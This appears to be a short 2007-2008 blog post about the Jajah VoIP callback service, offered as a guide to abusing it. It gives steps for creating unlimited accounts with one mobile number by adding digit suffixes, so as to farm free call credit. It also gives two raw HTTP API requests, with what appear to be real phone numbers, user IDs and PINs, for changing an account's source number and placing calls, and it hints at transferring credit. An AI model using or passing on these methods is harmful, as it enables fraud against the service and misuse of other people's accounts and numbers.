Jajah

Published on May 6, 2007

Jajah provides a cheap way to call using callback service. No doubt it is a great web/mobile application since it can save a lot of money! But Hoiio is better.

Moment of truth B

Another flaw with Jajah is that it allows user to create unlimited number of accounts with the same mobile number. Too bad they give only $0.25 USD free ):

  1. Register a new account with any name, email and a username that you can remember
  2. Enter your mobile number, but add some suffix Eg. If your number is 99998888, then enter 999988881
  3. Repeat with a different suffix Eg. 999988882

[Accurate as of Feb 2008]

Moment of truth A

But there are many serious flaws with Jajah. They have no security. Absolutely, zero. We just need to sniff their traffic and we will be able to figure out how to make a call and transfer credit. A very short guide to hacking them. Figure out the rest yourself!

The HTTP queries:

Step1: Change source number
http://www.jajah.com/engine/MobileAPI.aspx?message=mob-number-change;new-number=006597282928;type=mob-HTTP;uid=3021031;PIN=53749467;l=en;pt=0;v=0.3.3

Step2: Call!
http://www.jajah.com/engine/MobileAPI.aspx?message=CALL;dest=006593836208;type=mob-HTTP;uid=3021078;PIN=53749467;l=en;pt=0;v=0.3.3

[Accurate as of August 2007]

Found a Little Bug

</embed>